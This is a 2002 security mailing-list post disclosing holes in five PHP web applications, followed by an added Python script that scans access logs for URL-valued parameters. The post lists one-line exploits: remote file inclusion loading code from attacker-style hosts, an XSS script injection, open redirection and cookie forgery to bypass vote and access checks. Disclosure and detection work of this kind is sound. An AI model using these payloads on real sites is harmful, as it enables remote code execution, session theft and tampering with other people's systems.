Vulnerability Development: Achims Guestbook, InertiaNews, Pollen, MyPhpChat, mcPass

From: frog frog <leseulfrog_at_hotmail.com>
Date: 27 May 2002 08:52:10 -0000

Product 1 :
***********
Achims Guestbook 2.51 (and less?)
http://www.lkcc.org:8500/index.php

Problem :
- Information Disclosure

Exploits :
- /data/*.dat (e.g. : data.dat)
- /temp/*.tmp (e.g. : ip.tmp)

Product 2 :
***********
InertiaNews 0.02 beta
http://www.brentc.com

Problem :
- Require();

Exploit :
- http://www.victim.com/inertianews_main.php?inews_path=http://www.site.com
With http://www.site.com/inertia_sql_class.php

Product 3 :
***********
Pollen 1.4.1 (and less ?)
http://www.phpspirit.com

Problems :
- Path Disclosure
- Including file
- Distortion of the security against the multiple votes

Exploits :
- pollensondage.inc.php?app_path=non-existant-path
- Setcookie("pollensondage","")
- pollensondage.inc.php?app_path=http://www.haxor.com
with http://www.haxor.com/admin/phpext
- etc ...

Product 4 :
***********
MyPhpChat 1
http://www.creotec.com

Problems :
- XSS
- Redirection

Exploits :
- iframe.php?mynick=<script>[SCRIPT]</script>
- userlist.php?ME=http://www.site.com
- etc...

Product 5 :
***********
mcPass 1
http://www.phpforums.net

Problem :
- Distortion of security

Exploit :
- Setcookie("mcPass","AAAAA")


More details in French :
http://www.ifrance.com/kitetoua/tuto/5holes6.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2F5holes6.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=%2Flanguage_tools


frog-m_at_n

Received on May 27 2002
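
A defender-side check for the require()/include and redirection issues listed in the post, as an added example that is not part of the original message: it flags logged requests in which any query parameter's value is itself an absolute URL, which generalizes beyond the three parameters the post names. The log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters named in the post, with the issue the post lists for each.
KNOWN_PARAMS = {
    "inews_path": "InertiaNews require()",
    "app_path": "Pollen file inclusion",
    "ME": "MyPhpChat redirection",
}
# A parameter value that is itself an absolute URL.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# Request field of a Common Log Format line: "METHOD target HTTP/x.y".
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def url_valued_params(log_line):
    """Return (name, value, note) for each query parameter holding an absolute URL."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    hits = []
    # parse_qsl percent-decodes, so http%3A%2F%2F... is matched as well.
    for name, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            hits.append((name, value, KNOWN_PARAMS.get(name, "parameter not named in the post")))
    return hits


def scan(lines):
    """Return (line_number, hits) for every log line with at least one hit."""
    checked = ((i, url_valued_params(line)) for i, line in enumerate(lines, 1))
    return [(number, hits) for number, hits in checked if hits]


# Constructed sample log (documentation client addresses; hosts are the post's placeholders).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/May/2002:08:50:01 +0000] "GET /inertianews_main.php?inews_path=http://www.site.com HTTP/1.0" 200 512',
    '192.0.2.10 - - [27/May/2002:08:50:07 +0000] "GET /pollensondage.inc.php?app_path=http%3A%2F%2Fwww.haxor.com HTTP/1.0" 200 733',
    '198.51.100.4 - - [27/May/2002:08:51:12 +0000] "GET /userlist.php?ME=http://www.site.com HTTP/1.0" 302 0',
    '198.51.100.4 - - [27/May/2002:08:51:20 +0000] "GET /pollensondage.inc.php?app_path=non-existant-path HTTP/1.0" 200 120',
    '198.51.100.7 - - [27/May/2002:08:51:30 +0000] "GET /index.php?page=2 HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        for name, value, note in hits:
            print(f"line {number}: {name}={value} ({note})")
```

Access logs record only the request line, so parameters sent in a POST body are outside what this check sees.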